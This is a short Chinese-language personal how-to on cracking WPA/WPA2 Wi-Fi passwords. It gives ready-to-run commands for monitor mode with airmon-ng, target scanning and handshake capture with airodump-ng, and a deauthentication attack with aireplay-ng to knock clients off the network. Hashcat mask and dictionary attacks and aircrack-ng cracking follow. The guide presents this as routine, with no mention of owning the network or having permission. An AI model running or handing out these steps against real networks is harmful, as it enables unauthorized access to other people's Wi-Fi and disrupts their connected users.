本来以为不会再需要破解wifi了,但是最近又需要了,所以作个笔记方便以后再有突然需要
准备材料
- WIFI无线网卡(并不是所有网卡都行)
- aircrack-ng
- hashcat
初始化
- 查看本机的无线网卡
ifconfig -a
- 启动无线网卡,名称不一定是wlan0
airmon-ng start wlan0
- 查看附近网络,选取目标
airodump-ng wlan0mon
抓包
airodump-ng --bssid [目标路由MAC] -c [信道] -w [保存文件名] wlan0mon
为了提高概率,建议选择有人正在使用,然后通过以下命令发动deauth攻击使目标重连
aireplay-ng -0 [攻击数量] –a [路由器MAC] -c [客户端MAC] wlan0mon
确认和转换格式
使用aircrack-ng抓到的包可以先用EWSA确认一下是否有效,而后使用hashcat-utils或在线网站将cap转换为hccapx,后者能被hashcat使用,前者不行
暴力破解
特别说明
不管你的加密是WPA还是WPA2或者是mix,也不管你的算法是CCMP或TKIP或都是,都可以用 -m 2500 这个参数成功破解
破解命令格式
hashcat
破解8位纯数字格式
hashcat -m 2500 -a 3 [握手包] ?d?d?d?d?d?d?d?d
字典方式
hashcat -m 2500 -a 0 [握手包] [字典文件]
aircrack-ng
aircrack-ng -w [字典文件] [握手包]
hashcat性能调优
字典缓存大小(MB)
--segment-size 512
workload-profile
-w 3
默认是3,不推荐改成4,除非你无所谓
更多
请使用hashcat -h查看
清除历史
hashcat清除历史只需删除~/.hashcat/hashcat.potfile即可
VPS
hashcat在VPS上我没有成功,aircrack-ng需要执行以下命令
cp aircrack-ng/src/aircrack-crypto/.libs/libaircrack-crypto-x86-avx.so /usr/lib/x86_64-linux-gnu/libaircrack-crypto-x86-avx512.so
路径自己改一下,原issue